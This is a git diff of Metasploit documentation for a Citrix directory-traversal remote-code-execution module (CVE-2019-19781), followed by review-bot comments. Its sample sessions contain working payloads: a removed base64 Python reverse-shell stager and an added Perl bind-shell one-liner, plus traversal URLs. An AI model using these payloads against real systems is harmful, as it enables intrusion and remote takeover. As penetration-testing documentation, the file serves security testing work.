diff --git a/documentation/modules/exploit/linux/http/citrix_dir_traversal_rce.md b/documentation/modules/exploit/linux/http/citrix_dir_traversal_rce.md index 780a88bcf9..cd34c875f3 100644 --- a/documentation/modules/exploit/linux/http/citrix_dir_traversal_rce.md +++ b/documentation/modules/exploit/linux/http/citrix_dir_traversal_rce.md 
@@ -9,25 +9,39 @@ This `/vpns/` directory is interesting because it contains Perl code. The script A malicious attacker can execute arbitrary commands remotely by creating a corrupted xml file who use `Perl Template Toolkit` in part of payload. ``` -msf5 exploit(linux/http/citrix_dir_traversal_rce) > set rhosts [IP] -rhosts => XXX.XXX.XXX.XXX -msf5 exploit(linux/http/citrix_dir_traversal_rce) > set lhost [IP] -lhost => XXX.XXX.XXX.XXX -msf5 exploit(linux/http/citrix_dir_traversal_rce) > set verbose true -verbose => true msf5 exploit(linux/http/citrix_dir_traversal_rce) > run -[*] Started reverse TCP handler on XXX.XXX.XXX.XXX:4444 -[+] The target appears to be vulnerable. -[*] Sending python/meterpreter/reverse_tcp command payload -[*] Generated command payload: import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJ1hYWC5YWFguWFhYLlhYWCcsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo='))) -[*] Bookmark Added. -[*] Sending stage (53755 bytes) to XXX.XXX.XXX.XXX -[*] Meterpreter session 1 opened (XXX.XXX.XXX.XXX:4444 -> XXX.XXX.XXX.XXX:42881) at 2020-01-13 12:02:41 +0400 -[+] Deleted /var/tmp/netscaler/portal/templates/hBgGdPlkypbfZMvq.xml.ttc2 -[+] Deleted /netscaler/portal/templates/hBgGdPlkypbfZMvq.xml +[*] Using auxiliary/scanner/http/citrix_dir_traversal as check +[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781. +[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal. 
+[*] Scanned 1 of 1 hosts (100% complete) +[+] The target appears to be vulnerable +[*] Yeeting cmd/unix/generic payload at 127.0.0.1:8080 +[*] Generated payload: id +uid=65534(nobody) gid=65534(nobody) groups=65534(nobody) -meterpreter > +[!] This exploit may require manual cleanup of '/netscaler/portal/templates/mdjLHiHtIYmh.xml' on the target +[!] This exploit may require manual cleanup of '/var/tmp/netscaler/portal/templates/mdjLHiHtIYmh.xml.ttc2' on the target +[*] Exploit completed, but no session was created. +msf5 exploit(linux/http/citrix_dir_traversal_rce) > set payload cmd/unix/bind_perl +payload => cmd/unix/bind_perl +msf5 exploit(linux/http/citrix_dir_traversal_rce) > run + +[*] Using auxiliary/scanner/http/citrix_dir_traversal as check +[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781. +[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal. +[*] Scanned 1 of 1 hosts (100% complete) +[+] The target appears to be vulnerable +[*] Yeeting cmd/unix/bind_perl payload at 127.0.0.1:8080 +[*] Generated payload: perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};' +[!] No response to GET KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml request +[*] Started bind TCP handler against 127.0.0.1:4444 +[*] Command shell session 1 opened (127.0.0.1:51106 -> 127.0.0.1:4444) at 2020-01-13 20:50:45 -0600 +[+] Deleted /netscaler/portal/templates/KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml +[+] Deleted /var/tmp/netscaler/portal/templates/KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml.ttc2 + +id +uid=65534(nobody) gid=65534(nobody) groups=65534(nobody) ``` ## Verification Steps 
@@ -43,11 +57,10 @@ meterpreter > ## Targets ``` - Id Name - -- ---- - 0 Python (meterpreter) - 1 Unix (remote shell) - 2 Unix (command-line) +Id Name +-- ---- +0 Python +1 Unix Command ``` ## Advanced options @@ -58,6 +71,6 @@ Override check result. ## References - 1. - 2. - 3. +1. +2. +3.
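Review bot: in the first hunk (`@@ -9,25 +9,39 @@`) the sample session loses its setup without replacement: `set rhosts [IP]`, `set lhost [IP]` and `set verbose true` are removed and the new transcript starts directly at `run` against `127.0.0.1:8080`, so a reader cannot tell which options (RHOSTS, RPORT, and LPORT for `cmd/unix/bind_perl`) produced it. Suggest restoring a short `set` block before the first `run`, and adding a sentence for each outcome the new output shows: with `cmd/unix/generic` the command result (`uid=65534(nobody) ...`) is printed and `Exploit completed, but no session was created.` is the expected end state, not a failure; the `[!] No response to GET ... .xml request` line with the bind payload and the `[!] This exploit may require manual cleanup of ...` lines should be explained so an operator knows when the leftover `.xml` and `.xml.ttc2` template files must be removed by hand. While the file is being touched, the unchanged context sentence "creating a corrupted xml file who use `Perl Template Toolkit` in part of payload" could be reworded to "uploading a crafted XML template that embeds Perl Template Toolkit directives".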
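Review bot: the `## Targets` hunk renames the entries to `Python` and `Unix Command` but still gives no description of what each target accepts, even though the session above demonstrates two different `cmd/unix/*` payloads against one of them. Suggest a one-line note under the table stating which payload families pair with target `0 Python` and target `1 Unix Command`, so the table is usable on its own; if the block is meant to mirror `show targets` output, keep the leading indentation that the removed `-   Id  Name` lines had.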
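Review bot: the `## References` hunk changes only the indentation of `1.`, `2.`, `3.`, and in the visible lines all three entries are still empty, with no URL or title after the number. If the source uses angle-bracket autolinks that are dropped on render, replace them with plain `[title](url)` links or bare URLs; otherwise the references need to be filled in before this documentation is merged.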